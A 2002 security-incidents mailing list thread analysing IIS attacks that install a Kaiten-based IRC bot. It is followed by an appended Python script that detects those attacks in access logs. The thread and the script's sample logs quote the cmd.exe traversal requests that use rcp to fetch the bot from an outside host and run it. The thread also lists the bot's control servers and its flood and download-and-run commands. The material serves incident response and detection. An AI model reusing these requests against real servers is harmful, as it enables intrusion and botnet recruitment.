From: Dallas Jordan (DJordan_at_sawgrassink.com)
Date: Tue Sep 24 2002 - 16:20:19 CDT


    The Microsoft Baseline Security Analyzer is good for telling you what
    patches a computer needs and where to get them.

     -----Original Message-----
    From: zeno [mailto:bugtraqcgisecurity.net]
    Sent: Tuesday, September 24, 2002 2:29 PM
    To: MarkCmtbaker.wednet.edu
    Cc: pjesec.dk; incidentssecurityfocus.com
    Subject: Re: new IIS worm? (rcp lsass.exe)

    >
    > Hardening of IIS with the tools available at Microsoft and using URLSCAN
    > with the EXE blocking on will stop these attacks.
    >
    > Patch, patch, patch, recheck the patches and use URLSCAN!

    Does anyone know of a gui windows tool that scans your system and provides
    you with a list of needed patches, and then allows you to select, and have it
    autodownload and install them? I can't seem to find one (needed mostly for iis).

    - zenocgisecurity.com
     

    >
    > Mark Challender
    > Network Administrator
    >
    > ==================
    > Veni, Vidi, Geeki
    > ==================
    >
    >
    > -----Original Message-----
    > From: pjesec.dk [mailto:pjesec.dk]
    > Sent: Monday, September 23, 2002 3:27 AM
    > To: incidentssecurityfocus.com
    > Subject: Re: new IIS worm? (rcp lsass.exe)
    >
    >
    >
    > Christian Mock:
    >
    > >Then it seems to go after the web servers, sending the following:
    >
    > >GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:lsass.exe+. HTTP/1.0..
    >
    > >and
    >
    > >GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0
    >
    > >I've been able to get hold of that lsass.exe binary (9728 bytes), but
    > >I lack the skills to analyze it; I'll happily mail it to anybody who asks.
    >
    >
    > We have seen this attack from 4 different sources since Sept. 16, and have
    > informed the owner of 64.21.95.7 and downloaded the lsass.exe for
    > investigation.
    >
    > Based on the attack rate this is most likely a scripted or manual attack,
    > not a worm.
    >
    > Judging from the embedded string in this compressed binary it appears to
    > be an IRC bot based on the kaiten.c code written by contemefnet, the
    > author of the Slapper worm :
    >
    > Kaiten Win32 API version 2002 by contemefnet
    >
    > The binary contains these domain names, most likely IRC servers used for
    > controlling the bot:
    >
    > telsa5.mine.nu (Korea)
    > irc.logicfive.net (Taiwan)
    > moncredo.shacknet.nu (USA)
    > telsacredo.shacknet.nu (USA)
    > lar.ath.cx (Taiwan)
    >
    > The program accepts commands to make various DOS attacks or download new
    > version or executables with http:
    >
    > NOTICE %s :PUSH <target> <port> <secs> = A push flooder
    > NOTICE %s :TCP <target> <port> <secs> = A syn flooder
    > NOTICE %s :UDP <target> <port> <secs> = A udp flooder
    > NOTICE %s :MCON <target> <port> <times> = A connectbomb flooder
    > NOTICE %s :NICK <nick> = Changes the nick of the client
    > NOTICE %s :DISABLE <pass> = Disables all packeting from this client
    > NOTICE %s :ENABLE <pass> = Enables all packeting from this client
    > NOTICE %s :UPDATE <http address> = Downloads a file off the web and updates the client
    > NOTICE %s :RUN <http address> = Downloads a file off the web and runs it
    > NOTICE %s :GET <http address> = Downloads a file off the web
    > NOTICE %s :ADDSERVER <server> = Adds a server to the list
    > NOTICE %s :DELSERVER <server> = Deletes a server from the list
    > NOTICE %s :LISTSERVERS = Lists server on the list
    > NOTICE %s :KILL = Kills the client
    > NOTICE %s :VERSION = Requests version of client
    > NOTICE %s :HELP = Displays this
    >
    >
    > There seems also to be a default account and password in the german
    > language included in this specific version of Kaiten.
    >
    > The IIS attack that tries to inject this Trojan usually has another URL
    > with "CONNECT chat.vtm.be:6667". This is an attempt to proxy a connection
    > to port 6667(IRC) on chat.vtm.be.
    >
    >
    >
    > Peter Jelver
    > ...
    >
    > eSec A/S
    >
    > http://www.esec.dk
    >
    > .............................................................................
    >
    > PGP Fingerprint : 47AF FFEC D48F 9C13 0C4F E687 BB8A 128F D85C A7D7
    >
    >
    >
    >
    >
    >
    > ----------------------------------------------------------------------------
    > This list is provided by the SecurityFocus ARIS analyzer service.
    > For more information on this free incident handling, management
    > and tracking system please see: http://aris.securityfocus.com

    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management
    and tracking system please see: http://aris.securityfocus.com

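As an added example (not part of this thread, and not code from any tool mentioned in it), the following Python script shows how a defender could sweep IIS access logs for the two request shapes Peter Jelver describes: the `..%5c` traversal into `cmd.exe` (including the double-encoded `%255c` variant, which a single decode pass would miss) and the `CONNECT chat.vtm.be:6667` proxy attempt, tagging hits against the host indicators quoted in the post (the rcp source host 64.21.95.7 and the IRC hosts found in the binary). The log lines are constructed samples in Common Log Format: the client addresses, timestamps and status codes in them are made up, and the function names and tag strings are my own.

```python
from __future__ import annotations

import re
from urllib.parse import unquote

# Host indicators quoted in the post above: the rcp source host, the IRC
# hosts found in the lsass.exe binary, and the CONNECT proxy target.
IOC_HOSTS = {
    "64.21.95.7",
    "telsa5.mine.nu",
    "irc.logicfive.net",
    "moncredo.shacknet.nu",
    "telsacredo.shacknet.nu",
    "lar.ath.cx",
    "chat.vtm.be",
}
# Port the post associates with IRC command-and-control.
IRC_PORTS = {6667}

# Anchored so that 64.21.95.7 does not match inside e.g. 164.21.95.70.
IOC_PATTERNS = {
    h: re.compile(r"(?<![\w.])" + re.escape(h) + r"(?!\w)") for h in IOC_HOSTS
}

# Common Log Format: ip ident user [ts] "method target proto" status size
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log lines (hypothetical client IPs, timestamps and
# status codes); the request strings are the ones quoted in the thread.
SAMPLE_LOG = r'''
10.0.0.5 - - [23/Sep/2002:03:11:02 +0200] "GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:lsass.exe+. HTTP/1.0" 200 512
10.0.0.5 - - [23/Sep/2002:03:11:03 +0200] "GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0" 200 0
10.0.0.5 - - [23/Sep/2002:03:11:04 +0200] "CONNECT chat.vtm.be:6667 HTTP/1.0" 403 0
10.0.0.9 - - [23/Sep/2002:03:12:10 +0200] "GET /index.html HTTP/1.0" 200 1337
10.0.0.9 - - [23/Sep/2002:03:12:11 +0200] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0
'''


def normalize_path(raw: str) -> str:
    """URL-decode up to twice (so %5c and the double-encoded %255c both
    become a backslash), fold backslashes to slashes, and lowercase, so the
    traversal check sees the path roughly as the filesystem would."""
    decoded = raw
    for _ in range(2):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded.replace("\\", "/").lower()


def classify_request(method: str, target: str) -> list[str]:
    """Return detection tags for one request (empty list if nothing matched)."""
    tags = []
    if method.upper() == "CONNECT":
        host, _, port = target.lower().rpartition(":")
        if host in IOC_HOSTS or (port.isdigit() and int(port) in IRC_PORTS):
            tags.append("connect_proxy_to_irc")
        return tags
    path, _, query = target.partition("?")
    norm = normalize_path(path)
    if "/../" in norm and "cmd.exe" in norm:
        tags.append("cmd_exe_traversal")
        # cmd.exe arguments arrive '+'-separated; rcp means a remote fetch.
        if "rcp" in normalize_path(query).split("+"):
            tags.append("remote_copy_via_rcp")
    return tags


def analyze_log(text: str) -> list[dict]:
    """Parse CLF lines and return only those that carry at least one tag."""
    findings = []
    for line in text.strip().splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue  # a production tool would count unparsable lines
        tags = classify_request(m["method"], m["target"])
        low = line.lower()
        tags += [f"ioc_host:{h}" for h in sorted(IOC_HOSTS) if IOC_PATTERNS[h].search(low)]
        if tags:
            findings.append({
                "ip": m["ip"], "ts": m["ts"], "method": m["method"],
                "target": m["target"], "status": int(m["status"]), "tags": tags,
            })
    return findings


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f["ip"], f["status"], f["method"], f["target"][:60], ",".join(f["tags"]))
```

The status code is recorded rather than used as a filter: the double-encoded request in the sample returns 404, but it is still a probe worth correlating with the source address, and a 200 on the `rcp` line is the one that tells you the file fetch most likely succeeded.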